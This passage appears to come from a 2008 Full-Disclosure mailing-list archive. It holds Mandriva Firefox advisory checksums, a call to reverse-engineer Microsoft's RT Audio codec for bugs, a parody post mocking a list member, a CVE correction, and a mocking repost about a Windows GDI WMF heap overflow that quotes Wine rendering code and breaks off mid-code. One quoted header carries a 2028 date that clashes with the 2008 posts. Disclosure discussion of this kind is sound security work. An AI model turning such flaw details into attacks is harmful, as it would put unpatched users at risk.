corporate/3.0/SRPMS/mozilla-firefox-2.0.0.14-2.1.C30mdk.src.rpm 6b071c373a4df0606ce03f484b4ae4a5 corporate/3.0/SRPMS/mozilla-firefox-l10n-2.0.0.14-0.1.C30mdk.src.rpm Corporate 4.0: 121f92f9ed47e8eb4306180f3f958838 corporate/4.0/i586/libnspr4-2.0.0.14-2.1.20060mlcs4.i586.rpm de6b8ee4b2545b483acd1e43991ce3a6 corporate/4.0/i586/libnspr4-devel-2.0.0.14-2.1.20060mlcs4.i586.rpm 8a8fb9e00a193d4c7c00a63e1b17fe5e corporate/4.0/i586/libnspr4-static-devel-2.0.0.14-2.1.20060mlcs4.i586.rpm 397fdc03cc79e594734bcdf53bf42c60 corporate/4.0/i586/libnss3-2.0.0.14-2.1.20060mlcs4.i586.rpm 8d965f0d32b0a5355fecbbd19c75106a corporate/4.0/i586/libnss3-devel-2.0.0.14-2.1.20060mlcs4.i586.rpm 6b0c6f22edb88eaeeaeb54627b1c9e5b corporate/4.0/i586/mozilla-firefox-2.0.0.14-2.1.20060mlcs4.i586.rpm 5c79656259ced8947a29cacc587671ed corporate/4.0/i586/mozilla-firefox-af-2.0.0.14-0.1.20060mlcs4.i586.rpm 27a3ab85097d40b684e0eba85298448e corporate/4.0/i586/mozilla-firefox-ar-2.0.0.14-0.1.20060mlcs4.i586.rpm e5cfbdc9ef055d4920c4c6071dbe9c17 corporate/4.0/i586/mozilla-firefox-be-2.0.0.14-0.1.20060mlcs4.i586.rpm 249567621a074e1b6ad13cb1d6075422 corporate/4.0/i586/mozilla-firefox-bg-2.0.0.14-0.1.20060mlcs4.i586.rpm fc69549b607f3183dd851c0558788d52 corporate/4.0/i586/mozilla-firefox-br_FR-2.0.0.14-0.1.20060mlcs4.i586.rpm 3ff88f7a0768b142f47abe250eac42a4 corporate/4.0/i586/mozilla-firefox-ca-2.0.0.14-0.1.20060mlcs4.i586.rpm 0447e2ca1aec3203d2f27083990acb92 corporate/4.0/i586/mozilla-firefox-cs-2.0.0.14-0.1.20060mlcs4.i586.rpm 1c7b07fb8cae8f2d0ae9bc0e9af7a37e corporate/4.0/i586/mozilla-firefox-da-2.0.0.14-0.1.20060mlcs4.i586.rpm c58acfb1dd56311bd6a205e36342ece4 corporate/4.0/i586/mozilla-firefox-de-2.0.0.14-0.1.20060mlcs4.i586.rpm adcda2f617ec0f0833538397a8ce8522 corporate/4.0/i586/mozilla-firefox-devel-2.0.0.14-2.1.20060mlcs4.i586.rpm fa9c38e611d77b53ce92cba9b204f8ce corporate/4.0/i586/mozilla-firefox-el-2.0.0.14-0.1.20060mlcs4.i586.rpm 2c8bdc5120db43aba1ffd3f3069ff00d corporate/4.0/i586/mozilla-firefox-en_GB-2.0.0.14-0.1.20060mlcs4.i586.rpm 727df247b4e919f7825344ff65aa1619 corporate/4.0/i586/mozilla-firefox-es_AR-2.0.0.14-0.1.20060mlcs4.i586.rpm 082d2682759179d567dd0becb42797c4 corporate/4.0/i586/mozilla-firefox-es_ES-2.0.0.14-0.1.20060mlcs4.i586.rpm a4d59309204daab942c18ff2c5b6bafc corporate/4.0/i586/mozilla-firefox-et_EE-2.0.0.14-0.1.20060mlcs4.i586.rpm 8f068f69923a6455996b5ccd5b0d14c9 corporate/4.0/i586/mozilla-firefox-eu-2.0.0.14-0.1.20060mlcs4.i586.rpm 4da164e5a36567a920993258a3ad778b corporate/4.0/i586/mozilla-firefox-fi-2.0.0.14-0.1.20060mlcs4.i586.rpm 355570536e6f870d4a25af4425883fa5 corporate/4.0/i586/mozilla-firefox-fr-2.0.0.14-0.1.20060mlcs4.i586.rpm 01d71e0e86b7d396771b0529ac8d6a76 corporate/4.0/i586/mozilla-firefox-fy-2.0.0.14-0.1.20060mlcs4.i586.rpm f3c786902dd1142366adef392734c38b corporate/4.0/i586/mozilla-firefox-ga-2.0.0.14-0.1.20060mlcs4.i586.rpm 138eac3a2d3aeb11c171b0dc7dc36152 corporate/4.0/i586/mozilla-firefox-gu_IN-2.0.0.14-0.1.20060mlcs4.i586.rpm ac48f4ead256f69184aba0d3b10fe7bc corporate/4.0/i586/mozilla-firefox-he-2.0.0.14-0.1.20060mlcs4.i586.rpm 23b72b3d07d35a6e29b366f1013f6c74 corporate/4.0/i586/mozilla-firefox-hu-2.0.0.14-0.1.20060mlcs4.i586.rpm 5186530fbd1a1773f5ba3b6a119dea03 corporate/4.0/i586/mozilla-firefox-it-2.0.0.14-0.1.20060mlcs4.i586.rpm 70050cf002934833514f308dcf2f2ad0 corporate/4.0/i586/mozilla-firefox-ja-2.0.0.14-0.1.20060mlcs4.i586.rpm b05d6f734f83c37f19e20f32a1e67cb9 corporate/4.0/i586/mozilla-firefox-ka-2.0.0.14-0.1.20060mlcs4.i586.rpm 89318066e58d2e0898e0d4451e2bfedc corporate/4.0/i586/mozilla-firefox-ko-2.0.0.14-0.1.20060mlcs4.i586.rpm 0788d3a696b0270b04da85b30c3a8562 corporate/4.0/i586/mozilla-firefox-ku-2.0.0.14-0.1.20060mlcs4.i586.rpm 92d1a5034d4ef3f79561501ba083fb8d corporate/4.0/i586/mozilla-firefox-lt-2.0.0.14-0.1.20060mlcs4.i586.rpm ad7d9979291c31af33daecd108e65563 corporate/4.0/i586/mozilla-firefox-mk-2.0.0.14-0.1.20060mlcs4.i586.rpm 8aa71df73aa56844c300e2ad256e0bae corporate/4.0/i586/mozilla-firefox-mn-2.0.0.14-0.1.20060mlcs4.i586.rpm 6d0e84bfec781e07784cbeecab204667 corporate/4.0/i586/mozilla-firefox-nb_NO-2.0.0.14-0.1.20060mlcs4.i586.rpm bcdbd5f978694e7b44fed6d82fa67cf4 corporate/4.0/i586/mozilla-firefox-nl-2.0.0.14-0.1.20060mlcs4.i586.rpm 0b0adb6c389de6bbca642d02cd8ba1b8 corporate/4.0/i586/mozilla-firefox-nn_NO-2.0.0.14-0.1.20060mlcs4.i586.rpm 8d1ecc76f1bcb592fe13233edc483801 corporate/4.0/i586/mozilla-firefox-pa_IN-2.0.0.14-0.1.20060mlcs4.i586.rpm 8e88fcebdc2deb63ba04b9f49fc7705c corporate/4.0/i586/mozilla-firefox-pl-2.0.0.14-0.1.20060mlcs4.i586.rpm 5b170edd33388105ac089f2cf8ca620e corporate/4.0/i586/mozilla-firefox-pt_BR-2.0.0.14-0.1.20060mlcs4.i586.rpm 1e8abb22e62f06c84743e714103813a4 corporate/4.0/i586/mozilla-firefox-pt_PT-2.0.0.14-0.1.20060mlcs4.i586.rpm a927b41b1287f7d6e1e96f0bbb2485e0 corporate/4.0/i586/mozilla-firefox-ro-2.0.0.14-0.1.20060mlcs4.i586.rpm 01fd439bca077af3cb2adfab646613fe corporate/4.0/i586/mozilla-firefox-ru-2.0.0.14-0.1.20060mlcs4.i586.rpm dd584e2705abac652b8ae24b0a2d88b1 corporate/4.0/i586/mozilla-firefox-sk-2.0.0.14-0.1.20060mlcs4.i586.rpm c1b9de07ccad4c522e7ddcd4605d7379 corporate/4.0/i586/mozilla-firefox-sl-2.0.0.14-0.1.20060mlcs4.i586.rpm b5e626fc138435be05e806a236fbf091 corporate/4.0/i586/mozilla-firefox-sv_SE-2.0.0.14-0.1.20060mlcs4.i586.rpm 17d9b5d3b7696cfed7db8f19562b7660 corporate/4.0/i586/mozilla-firefox-tr-2.0.0.14-0.1.20060mlcs4.i586.rpm 08992153218c2acfc4a03d9f654a4e8b corporate/4.0/i586/mozilla-firefox-uk-2.0.0.14-0.1.20060mlcs4.i586.rpm 17029ca1bd4fd9948d54e92f7af0e13c corporate/4.0/i586/mozilla-firefox-zh_CN-2.0.0.14-0.1.20060mlcs4.i586.rpm 4966a31eb88f01ac01cb55ee11e1aacc corporate/4.0/i586/mozilla-firefox-zh_TW-2.0.0.14-0.1.20060mlcs4.i586.rpm 3c22d88cd68b946ba42ece96f26e6150 corporate/4.0/SRPMS/mozilla-firefox-2.0.0.14-2.1.20060mlcs4.src.rpm 3a63a604e0e4297d0b02b3526cbac76e corporate/4.0/SRPMS/mozilla-firefox-l10n-2.0.0.14-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: bb3bbc6f1ef1e7962fa3b8132fd3002e corporate/4.0/x86_64/lib64nspr4-2.0.0.14-2.1.20060mlcs4.x86_64.rpm facac14d00c24bef35fd71cf12d2c07d corporate/4.0/x86_64/lib64nspr4-devel-2.0.0.14-2.1.20060mlcs4.x86_64.rpm 5b894e70a61ad2afa9e06b8947b2cbed corporate/4.0/x86_64/lib64nspr4-static-devel-2.0.0.14-2.1.20060mlcs4.x86_64.rpm 23b269987896c06450f683c8a235330b corporate/4.0/x86_64/lib64nss3-2.0.0.14-2.1.20060mlcs4.x86_64.rpm 7e8179a995720c159c8495c31a02f028 corporate/4.0/x86_64/lib64nss3-devel-2.0.0.14-2.1.20060mlcs4.x86_64.rpm 335fcc6cf5f4d11d8586b9cce529a557 corporate/4.0/x86_64/mozilla-firefox-2.0.0.14-2.1.20060mlcs4.x86_64.rpm 03a3a39dee287ea5e7b5703812a38fc0 corporate/4.0/x86_64/mozilla-firefox-af-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 3c63724077e403efd7e88a1bec130326 corporate/4.0/x86_64/mozilla-firefox-ar-2.0.0.14-0.1.20060mlcs4.x86_64.rpm c2afcaad284af493ed9c1241cb71698d corporate/4.0/x86_64/mozilla-firefox-be-2.0.0.14-0.1.20060mlcs4.x86_64.rpm e19966d2bbe8545088a4e828f79df62b corporate/4.0/x86_64/mozilla-firefox-bg-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 6a70b6e7b4a12734792c76087b34aa5e corporate/4.0/x86_64/mozilla-firefox-br_FR-2.0.0.14-0.1.20060mlcs4.x86_64.rpm de3a3794379b84e2816f5c8d14314cf9 corporate/4.0/x86_64/mozilla-firefox-ca-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 0ed47b30bb15291cab4e661d6c22885a corporate/4.0/x86_64/mozilla-firefox-cs-2.0.0.14-0.1.20060mlcs4.x86_64.rpm b5e8b8366b75104da85e3da8ab736bf6 corporate/4.0/x86_64/mozilla-firefox-da-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 17c01fce41da72823374d4e21dc6d2b4 corporate/4.0/x86_64/mozilla-firefox-de-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 4ca35986a2515ce7db30ea6e898562c5 corporate/4.0/x86_64/mozilla-firefox-devel-2.0.0.14-2.1.20060mlcs4.x86_64.rpm 33ee4512551c85066d5e9081da1cc3e9 corporate/4.0/x86_64/mozilla-firefox-el-2.0.0.14-0.1.20060mlcs4.x86_64.rpm f7b6d8ad32a6bce498114f35be3e745a corporate/4.0/x86_64/mozilla-firefox-en_GB-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 3763207014f8a34982077ebd090b9b9d corporate/4.0/x86_64/mozilla-firefox-es_AR-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 0c0d7880e039d803cdc02f2209482e66 corporate/4.0/x86_64/mozilla-firefox-es_ES-2.0.0.14-0.1.20060mlcs4.x86_64.rpm e99396d0067086bfe254b3a563826638 corporate/4.0/x86_64/mozilla-firefox-et_EE-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 41d6407757da3b28b6daea0931ec0236 corporate/4.0/x86_64/mozilla-firefox-eu-2.0.0.14-0.1.20060mlcs4.x86_64.rpm ea0befdae85d43aeea9ad4338076acf3 corporate/4.0/x86_64/mozilla-firefox-fi-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 6a185bc6915a642eb1eeaa2be61e2f05 corporate/4.0/x86_64/mozilla-firefox-fr-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 37cbc0eb6f7e23dfbc4e3c7f6e4ca4f4 corporate/4.0/x86_64/mozilla-firefox-fy-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 9f922d764ed58bb09e110994778403a0 corporate/4.0/x86_64/mozilla-firefox-ga-2.0.0.14-0.1.20060mlcs4.x86_64.rpm a820b741dc1b0fe9ee3fb638e60e4127 corporate/4.0/x86_64/mozilla-firefox-gu_IN-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 2200827e02343cd9c7689791671d17e9 corporate/4.0/x86_64/mozilla-firefox-he-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 5aba41a4a760312bf986715cbf747ed0 corporate/4.0/x86_64/mozilla-firefox-hu-2.0.0.14-0.1.20060mlcs4.x86_64.rpm f60b34de19fd612b11305bff6263b998 corporate/4.0/x86_64/mozilla-firefox-it-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 60dfec168db12e48580cf2af35fec233 corporate/4.0/x86_64/mozilla-firefox-ja-2.0.0.14-0.1.20060mlcs4.x86_64.rpm eb5d13268301bf18185a8b414e9ed7ec corporate/4.0/x86_64/mozilla-firefox-ka-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 74c69695365d6cd15b013dec682704dd corporate/4.0/x86_64/mozilla-firefox-ko-2.0.0.14-0.1.20060mlcs4.x86_64.rpm a398af22369074126f49c482c76c9189 corporate/4.0/x86_64/mozilla-firefox-ku-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 924fcb5352f839a329c262344dd107d1 corporate/4.0/x86_64/mozilla-firefox-lt-2.0.0.14-0.1.20060mlcs4.x86_64.rpm d0f96eb225355be422fd36d8c05dbf16 corporate/4.0/x86_64/mozilla-firefox-mk-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 547c29fb9f089f7ca451c913c8416ba5 corporate/4.0/x86_64/mozilla-firefox-mn-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 56dfc17bf996fb9a73b42720b6a2ba54 corporate/4.0/x86_64/mozilla-firefox-nb_NO-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 220616ed00be3fc39ff0d8f3ddd407f5 corporate/4.0/x86_64/mozilla-firefox-nl-2.0.0.14-0.1.20060mlcs4.x86_64.rpm b786fb7b70ef24676839c80dc0767ce4 corporate/4.0/x86_64/mozilla-firefox-nn_NO-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 8024f9c18676a990337997c756fb86d6 corporate/4.0/x86_64/mozilla-firefox-pa_IN-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 9240ddbc3dc5e4441a402979ed5a223c corporate/4.0/x86_64/mozilla-firefox-pl-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 5b5f05a069aeaf6b07e04c17da29712d corporate/4.0/x86_64/mozilla-firefox-pt_BR-2.0.0.14-0.1.20060mlcs4.x86_64.rpm c440e206289e1414af27df55b16f9785 corporate/4.0/x86_64/mozilla-firefox-pt_PT-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 43cdfc65481562027f70fc2d933e1978 corporate/4.0/x86_64/mozilla-firefox-ro-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 938b2bee16815e0ecf02f26e44d8348e corporate/4.0/x86_64/mozilla-firefox-ru-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 05d12f5cf2bb7df1801f6b7f938be2b9 corporate/4.0/x86_64/mozilla-firefox-sk-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 6f71aa8c9a5325900e168095446b13f1 corporate/4.0/x86_64/mozilla-firefox-sl-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 779a9dbe79b8bd3b49e0e2549068d393 corporate/4.0/x86_64/mozilla-firefox-sv_SE-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 610762b64f21a5df7212f8dbdafead62 corporate/4.0/x86_64/mozilla-firefox-tr-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 862875ea445550a16e93bce2b27dbbd3 corporate/4.0/x86_64/mozilla-firefox-uk-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 30e9643ea233314b775bd091b3741de9 corporate/4.0/x86_64/mozilla-firefox-zh_CN-2.0.0.14-0.1.20060mlcs4.x86_64.rpm f4ce003fd169c879506d66ce6a5c8045 corporate/4.0/x86_64/mozilla-firefox-zh_TW-2.0.0.14-0.1.20060mlcs4.x86_64.rpm 3c22d88cd68b946ba42ece96f26e6150 corporate/4.0/SRPMS/mozilla-firefox-2.0.0.14-2.1.20060mlcs4.src.rpm 3a63a604e0e4297d0b02b3526cbac76e corporate/4.0/SRPMS/mozilla-firefox-l10n-2.0.0.14-0.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFISKEUmqjQ0CJFipgRAppvAKDEMBUBXFfDlZhO4r66qN9nioGTxgCglluT TxyTTOjZBtV7RDXYIknHGjY= =skXW -----END PGP SIGNATURE----- From lists at infosecurity.ch Fri Jun 6 08:30:12 2008 From: lists at infosecurity.ch (Fabio Pietrosanti (naif)) Date: Fri, 06 Jun 2008 09:30:12 +0200 Subject: [Full-disclosure] Microsoft RT Audio Codec, anyone has reversed it? Message-ID: <4848E784.6020308@infosecurity.ch> Hi all, has anyone reversed the new Microsoft RT Audio Codec used by Microsoft Live Messenger and Office Communication Server? It seems that in a world where free narrowband and wideband codec such as Speex are now available Microsoft preferred to reinvent the wheel and provide their own proprietary, closed source audio codec. It's time to reverse engineer it! I am sure that's plenty of nice bugs ;) -naif http://download.microsoft.com/download/3/8/0/3803da3e-3f1e-4faa-ba22-b217385df052/RTAudio%2520Overview.doc http://blog.tmcnet.com/blog/tom-keating/microsoft/microsoft-licenses-rt-audio-codec-and-launches-new-qos-monitoring-tool.asp From andrew.awal.wallace at gmail.com Fri Jun 6 12:10:34 2008 From: andrew.awal.wallace at gmail.com (Andrew Wallace) Date: Fri, 6 Jun 2008 07:10:34 -0400 Subject: [Full-disclosure] [OT] Fwd: Comments on: Phoenix Mars Lander site hacked Message-ID: This post is made by andrew.awal.wallace at gmail.com, my secret identity for my serious security researches on the computer for when I research things at the same time that I am on the computer doing research for security stuff. The questions that I ask and the points that I raise in this email are due to opinions that I have formed. From: n3td3v Date: Wed, 4 Jun 2008 20:29:05 +0100 > > >I'm not a troll, i'm a serious security researcher. > >I was misrepresented in the media by SecurityFocus Robert Lemos who >ruined my image. > >The findings have been post, > >http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smear-campaign-against-n3td3v.html Yes, n3td3v post that. n3td3v's last three paragraphs at n3td3v's blogspot are copied below with questions to the n3td3v. n3td3v Paragraph 1: This is a long standing issue which will go on for years until regret is shown by Neal Krawetz and Robert Lemos... n3td3v is still on Full-Disclosure and will never stop posting, and its none of both their businesses who I am. ++Did the long standing issue that will end in regret for Robert Lemos have to do with what happened to the Robert Lemos website? Did Robert Lemos learn who the n3td3v is - or is it none of his business? n3td3v Paragraph 2: n3td3v might be available for a real interview for a large sum of money, based on facts... otherwise, you're a suckers and will never know the truth!!! It will forever be your mystery who is n3td3v!!!! *Evil laughter*. ++Did n3td3v get that large sum of money? ++If yes, then n3td3v might not care about others calling n3td3v a troll even if n3td3v is in the troll role. ++If not, then according to n3td3v blogspot all others but n3td3v are suckers who do not know the secret identity that is n3td3v. Mwahahahaha (Evil laughter). n3td3v Paragraph 3: I'll see you both at the security conferences some time i'm sure and you can tell me all about your smear campaign(s) and yellow journalism(s). ++Did n3td3v get to a security conference? If n3td3v managed to get to a conference, what did n3td3v do and say to the people that n3td3v swore would feel regret? I am worried about security flaws in the major operating systems like L1nukz, w1ndoe$ 3ck$pee, 200x, and veeeezthaaa. I use Windows 98. One day I may upgrade to windows for workgroups when I get another computer to network together with my first and do MASSIVELY MULTIPLAYER SECURITY RESEARCH! The only problem I have ever had with Windows 98 is that it is sometimes difficult to get software to run like my picasa (with heads photoshopped out), anti-virus (but that is becuase no anti-virus is needed on this great operating system I am told that I am covered in pwnsauce but they are only trying to make the crazy guy, me, angry), and certain other google applications from that fine company called GOOG which I will one day invest in when I have made my first million in capital. You will all then fear me then because I will have made my first million in capital. I know that none of you have made any money. How could you? I dont like you so you must not have money. All and more of the best for all of you, // A.a.W. --------------------- ::::This email is a parody of the nonsense that certain individuals post to this list. There is no value or intent behind this email. --------------------- From labs-no-reply at idefense.com Fri Jun 6 14:13:18 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 06 Jun 2008 09:13:18 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.04.08: VMware Tools HGFS Local Privilege Escalation Vulnerability In-Reply-To: <4847ED34.9030003@idefense.com> References: <4847ED34.9030003@idefense.com> Message-ID: <484937EE.1070505@idefense.com> iDefense Labs wrote: > iDefense Labs wrote: >> VII. CVE INFORMATION >> >> The Common Vulnerabilities and Exposures (CVE) project has assigned >> the name CVE-2008-5671 to this issue. This is a candidate for >> inclusion in the CVE list (http://cve.mitre.org/), which standardizes >> names for security problems. > > This should be CVE-2007-5761. iDefense would like to thank VMware for pointing out that the *REAL* correct CVE is CVE-2007-5671. iDefense Labs From nikolaos.rangos at nruns.com Fri Jun 6 15:35:11 2008 From: nikolaos.rangos at nruns.com (Nikolaos Rangos) Date: Fri, 06 Jun 2008 14:35:11 -0000 Subject: [Full-disclosure] =?iso-8859-1?q?FW=3A_SOMEONE_CAN_HELP_WITH_THE_?= =?iso-8859-1?q?Microsoft_GDI_WMF_Parsing_Heap_Overflow_Vulnerabili?= =?iso-8859-1?q?ty_=3F_IT=B4s_a_bit_wired=2E=2E=2E?= Message-ID: <0ML25U-1K4d243Kj5-000746@mrelayeu.kundenserver.de> -----Original Message----- From: Nikolaos Rangos [mailto:nikolaos.rangos at nruns.com] Sent: Wednesday, June 07, 2028 3:36 PM To: 'full-disclosure at lists.grok.org.uk' Subject: SOMEONE CAN HELP WITH THE Microsoft GDI WMF Parsing Heap Overflow Vulnerability ? IT?s a bit wired... Microsoft GDI WMF Parsing Heap Overflow Vulnerability - MAY SOMEONE HELP? IT'S A MEAN BUG - OR AM I MAAAAAAAAAAAAAAD!? MAYBE !? SOME ONE PWN THAT SHIT! DISCLOSURE DAY 7 JUNE // MAYBE SOMEONE HELP THE GUYS WITH THE PATTERN BYTE?! BILLY THE KID IS MADDER THAN THEO! PS SSSHSSHHSHSHSHSHSHSUTTTUPTEO Affected Vendors Microsoft *** MikeRoweSoft (BTW WHERES HIS XBOX?????) Affected Products Windows XP SP2 Windows 2003 SP1 Windows Vista Windows 2000 SP4 Vulnerability Details ~+~~+~~+~~+~~+~~+~~+~ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required in that a user must open a malicious file or visit a malicious web page. The specific flaw exists within the parsing of malformed WMF files. A vulnerability exists in the *GDI* funcion CreateDIBPatternBrushPt used when processing WMF files. Due to a mis-calculation of user data a heap chunk can be under-allocated and later used resulting in a heap overflow. Successful exploitation can result in system compromise under the credentials of the currently logged in user. Vendor Response Microsoft has issued an update to correct this vulnerability. More details can be found below (Look at the migization factors): ------ CURRENT WiNE TREE WaReZ: /****************************************************************** * PlayMetaFileRecord (GDI32.@) * * Render a single metafile record specified by *mr in the DC hdc, while * using the handle table *ht, of length handles, * to store metafile objects. * * BUGS * The following metafile records are unimplemented: * * DRAWTEXT, ANIMATEPALETTE, SETPALENTRIES, * RESIZEPALETTE, EXTFLOODFILL, RESETDC, STARTDOC, STARTPAGE, ENDPAGE, * ABORTDOC, ENDDOC, CREATEBRUSH, CREATEBITMAPINDIRECT, and CREATEBITMAP. */ BOOL WINAPI PlayMetaFileRecord( HDC hdc, HANDLETABLE *ht, METARECORD *mr, UINT handles ) { short s1; POINT *pt; BITMAPINFOHEADER *infohdr; TRACE("(%p %p %p %u) function %04x\n", hdc, ht, mr, handles, mr->rdFunction); switch (mr->rdFunction) { case META_EOF: break; case META_DELETEOBJECT: DeleteObject(*(ht->objectHandle + mr->rdParm[0])); *(ht->objectHandle + mr->rdParm[0]) = 0; break; case META_SETBKCOLOR: SetBkColor(hdc, MAKELONG(mr->rdParm[0], mr->rdParm[1])); break; case META_SETBKMODE: SetBkMode(hdc, mr->rdParm[0]); break; case META_SETMAPMODE: SetMapMode(hdc, mr->rdParm[0]); break; case META_SETROP2: SetROP2(hdc, mr->rdParm[0]); break; case META_SETRELABS: SetRelAbs(hdc, mr->rdParm[0]); break; case META_SETPOLYFILLMODE: SetPolyFillMode(hdc, mr->rdParm[0]); break; case META_SETSTRETCHBLTMODE: SetStretchBltMode(hdc, mr->rdParm[0]); break; case META_SETTEXTCOLOR: SetTextColor(hdc, MAKELONG(mr->rdParm[0], mr->rdParm[1])); break; case META_SETWINDOWORG: SetWindowOrgEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_SETWINDOWEXT: SetWindowExtEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_SETVIEWPORTORG: SetViewportOrgEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_SETVIEWPORTEXT: SetViewportExtEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_OFFSETWINDOWORG: OffsetWindowOrgEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_SCALEWINDOWEXT: ScaleWindowExtEx(hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_OFFSETVIEWPORTORG: OffsetViewportOrgEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_SCALEVIEWPORTEXT: ScaleViewportExtEx(hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_LINETO: LineTo(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_MOVETO: MoveToEx(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0], NULL); break; case META_EXCLUDECLIPRECT: ExcludeClipRect( hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0] ); break; case META_INTERSECTCLIPRECT: IntersectClipRect( hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0] ); break; case META_ARC: Arc(hdc, (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_ELLIPSE: ** YEAH CLOSE TO THAT, LOOK DOWN Ellipse(hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_FLOODFILL: FloodFill(hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], MAKELONG(mr->rdParm[0], mr->rdParm[1])); break; case META_PIE: Pie(hdc, (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_RECTANGLE: Rectangle(hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_ROUNDRECT: RoundRect(hdc, (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_PATBLT: PatBlt(hdc, (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], MAKELONG(mr->rdParm[0], mr->rdParm[1])); break; case META_SAVEDC: SaveDC(hdc); break; case META_SETPIXEL: SetPixel(hdc, (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], MAKELONG(mr->rdParm[0], mr->rdParm[1])); break; case META_OFFSETCLIPRGN: OffsetClipRgn( hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0] ); break; case META_TEXTOUT: s1 = mr->rdParm[0]; TextOutA(hdc, (SHORT)mr->rdParm[((s1 + 1) >> 1) + 2], (SHORT)mr->rdParm[((s1 + 1) >> 1) + 1], (char *)(mr->rdParm + 1), s1); break; case META_POLYGON: ** BILLY CAN DRAW POLYGONS// WTF ABOUT CIRCLES????? if ((pt = convert_points( mr->rdParm[0], (LPPOINT16)(mr->rdParm + 1)))) { Polygon(hdc, pt, mr->rdParm[0]); HeapFree( GetProcessHeap(), 0, pt ); } break; case META_POLYPOLYGON: { UINT i, total; SHORT *counts = (SHORT *)(mr->rdParm + 1); for (i = total = 0; i < mr->rdParm[0]; i++) total += counts[i]; pt = convert_points( total, (LPPOINT16)(counts + mr->rdParm[0]) ); if (pt) { INT *cnt32 = HeapAlloc( GetProcessHeap(), 0, mr->rdParm[0] * sizeof(*cnt32) ); if (cnt32) { for (i = 0; i < mr->rdParm[0]; i++) cnt32[i] = counts[i]; PolyPolygon( hdc, pt, cnt32, mr->rdParm[0]); HeapFree( GetProcessHeap(), 0, cnt32 ); } } HeapFree( GetProcessHeap(), 0, pt ); } break; case 